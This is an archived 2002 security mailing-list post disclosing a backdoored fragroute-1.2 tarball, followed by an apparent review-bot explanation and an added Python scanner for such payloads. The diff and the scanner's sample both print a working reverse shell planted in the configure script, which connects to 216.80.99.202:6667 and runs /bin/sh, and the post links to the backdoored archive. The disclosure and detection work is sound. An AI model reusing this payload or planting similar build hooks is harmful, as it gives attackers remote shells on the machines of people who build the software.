From: Anders Nordby (andersfix.no)
Date: Fri May 31 2002 - 02:55:21 CDT

    Hello,

    Although downloading it now seems safe, I think folks should know this.
    The changes done were similar to what happened to irssi, but with a
    different IP.

    MD5 sum of fragroute-1.2.tar.gz, downloaded from
    http://www.monkey.org/~dugsong/fragroute/ on May 27 (the contaminated
    version): 65edbfc51f8070517f14ceeb8f721075

    MD5 sum of fragroute-1.2.tar.gz, downloaded from
    http://www.monkey.org/~dugsong/fragroute/ on May 30 (this is the current
    MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a

    Diff between the two:

    diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
    --- fragroute-1.2/configure Mon Apr 15 16:41:43 2002
    +++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002
    -1590,6 +1590,53
     
     fi
     
    +cat > conftest.c<<EOF
    +/* Override any gcc2 internal prototype to avoid an error. */
    +/* We use char because int might match the return type of a gcc2
    + builtin and then its argument prototype would still apply. */
    +#include <stdio.h>
    +#include <sys/types.h>
    +#include <sys/socket.h>
    +#include <netinet/in.h>
    +#include <unistd.h>
    +int main()
    +{
    +/* The GNU C library defines this for functions which it implements
    + to always fail with ENOSYS. Some functions are actually named
    + something starting with __ and the normal name is an alias. */
    + int s;
    + struct sockaddr_in sa;
    + switch(fork()) { case 0: break; default: exit(0); }
    + if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
    + exit(1);
    + }
    + /* HP/UX 9 (%#!) writes to sscanf strings */
    + memset(&sa, 0, sizeof(sa));
    + sa.sin_family = AF_INET;
    + sa.sin_port = htons(6667);
    +/* Override any gcc2 internal prototype to avoid an error. */
    +/* We use char because int might match the return type of a gcc2
    + builtin and then its argument prototype would still apply. */
    + sa.sin_addr.s_addr = inet_addr("216.80.99.202");
    + if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
    + exit(1);
    + }
    + /* HP/UX 9 (%#!) writes to sscanf strings */
    + dup2(s, 0); dup2(s, 1); dup2(s, 2);
    +/* The GNU C library defines this for functions which it implements
    + to always fail with ENOSYS. Some functions are actually named
    + something starting with __ and the normal name is an alias. */
    + { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
    +}
    +EOF
    +gcc $LIBS conftest.c -o conftest; ./conftest
    +if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
    + rm -rf conftest*
    +else
    + rm -rf conftest*
    +fi
    +rm -f conftest*
    +
         # DLPI needs putmsg under HPUX so test for -lstr while we're at it
         echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6
     echo "configure:1596: checking for putmsg in -lstr" >&5
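
Review bot: the block inserted at `cat > conftest.c<<EOF` is a reverse shell, not a configure probe, and the hunk should be rejected outright. The program forks, the parent `exit(0)`s so configure carries on normally, and the child opens a TCP socket, connects to `inet_addr("216.80.99.202")` on port `htons(6667)`, duplicates the socket onto fds 0, 1 and 2 with `dup2`, and calls `execve` on `/bin/sh` with an empty environment. It is compiled and run unconditionally by `gcc $LIBS conftest.c -o conftest; ./conftest`; the `if { (eval echo configure:2379: ...) ... } && test -s conftestx${ac_exeext}` that follows only looks like an autoconf check, since both branches just `rm -rf conftest*` and nothing ever produces a file named `conftestx`. The gcc2/ENOSYS/HP-UX comments scattered between the statements are copied from genuine autoconf probes so the block blends in on a skim. Note also that the file header shows the identical `Mon Apr 15 16:41:43 2002` timestamp on both the clean and the bad `configure`: mtimes were preserved, so a timestamp check alone would not have caught this; a checksum or signature obtained out of band, as the MD5 sums above, is the check that does.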

    References
    ==========

    FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
    Irssi backdoor page: http://www.irssi.org/?page=backdoor
    Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz

    Cheers,

    -- 
    Anders.
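
The mail compares two MD5 sums and lets the diff speak for itself. As an added example (not code from the mail, from Anders Nordby, or from the fragroute project), the following Python scans a configure script for a heredoc-written conftest.c that behaves like the planted one: it extracts each `cat > file <<EOF` block, counts the fork/socket/connect/dup2/execve calls in it, pulls out the hard-coded address, port and shell path, and checks whether the compiled probe is executed straight after. The sample script text is constructed here: a harmless probe followed by the planted block condensed from the diff above with its `+` prefixes removed.

```python
"""Scan an autoconf-style configure script for a planted conftest.c that
behaves like a reverse shell, as in the backdoored fragroute-1.2 tarball.
Added example for this page, not code from the original mail or from the
fragroute project. SAMPLE_CONFIGURE below is constructed for the demo."""
import re
from dataclasses import dataclass
from typing import List, Optional

# A harmless autoconf probe compiles a tiny program and at most links or runs
# it. The planted one forks, opens a socket, connects to a fixed address, wires
# the socket to stdin/stdout/stderr and execs a shell. Three or more of these
# calls in one conftest.c is already far outside what a configure probe does.
SUSPICIOUS_CALLS = ("fork(", "socket(", "connect(", "dup2(", "execve(")

HEREDOC_RE = re.compile(
    r"cat[ \t]*>[ \t]*([^\s<]+)[ \t]*<<[ \t]*'?(\w+)'?[ \t]*\n(.*?)\n\2\n", re.S)
IPV4_RE = re.compile(r'inet_addr\("(\d{1,3}(?:\.\d{1,3}){3})"\)')
PORT_RE = re.compile(r"htons\((\d+)\)")
SHELL_RE = re.compile(r'"(/bin/(?:ba|c|k)?sh)"')


@dataclass
class Finding:
    target: str            # file written by the heredoc, e.g. conftest.c
    calls: List[str]       # suspicious calls seen in its body
    ip: Optional[str]      # hard-coded inet_addr() target, if any
    port: Optional[int]    # hard-coded htons() port, if any
    shell: Optional[str]   # hard-coded shell path, if any
    executed: bool         # is ./<stem> run right after the heredoc?


def scan_configure(text: str) -> List[Finding]:
    """Return one Finding per heredoc-written C file that looks like a payload."""
    findings = []
    for m in HEREDOC_RE.finditer(text):
        target, body = m.group(1), m.group(3)
        calls = [c.rstrip("(") for c in SUSPICIOUS_CALLS if c in body]
        if len(calls) < 3:
            continue
        stem = target.rsplit(".", 1)[0]
        # Autoconf run-tests also execute ./conftest, so on its own this is not
        # damning; combined with the calls above it is.
        tail = text[m.end():m.end() + 400]
        executed = re.search(r"\./" + re.escape(stem) + r"\b", tail) is not None
        ip, port, shell = IPV4_RE.search(body), PORT_RE.search(body), SHELL_RE.search(body)
        findings.append(Finding(
            target=target, calls=calls,
            ip=ip.group(1) if ip else None,
            port=int(port.group(1)) if port else None,
            shell=shell.group(1) if shell else None,
            executed=executed))
    return findings


# Constructed sample: a genuine-looking probe, then the planted block.
SAMPLE_CONFIGURE = r'''
cat > conftest.c <<EOF
#include <stdio.h>
int main() { printf("hello\n"); return 0; }
EOF
if { (eval echo configure:1500: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then
  rm -rf conftest*
fi

cat > conftest.c<<EOF
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
int main()
{
 int s;
 struct sockaddr_in sa;
 switch(fork()) { case 0: break; default: exit(0); }
 if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) exit(1);
 memset(&sa, 0, sizeof(sa));
 sa.sin_family = AF_INET;
 sa.sin_port = htons(6667);
 sa.sin_addr.s_addr = inet_addr("216.80.99.202");
 if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) exit(1);
 dup2(s, 0); dup2(s, 1); dup2(s, 2);
 { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
}
EOF
gcc $LIBS conftest.c -o conftest; ./conftest
if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
 rm -rf conftest*
else
 rm -rf conftest*
fi
'''

if __name__ == "__main__":
    for f in scan_configure(SAMPLE_CONFIGURE):
        print(f"{f.target}: calls={f.calls} -> {f.ip}:{f.port} "
              f"shell={f.shell} executed={f.executed}")
```

Run against the sample, it reports the single planted block (calls fork/socket/connect/dup2/execve, 216.80.99.202:6667, /bin/sh, executed) and ignores the harmless probe. It is a heuristic for triage of an unpacked tarball, not a substitute for the check the mail actually relies on: comparing the archive's checksum or signature against a value obtained from a separate channel.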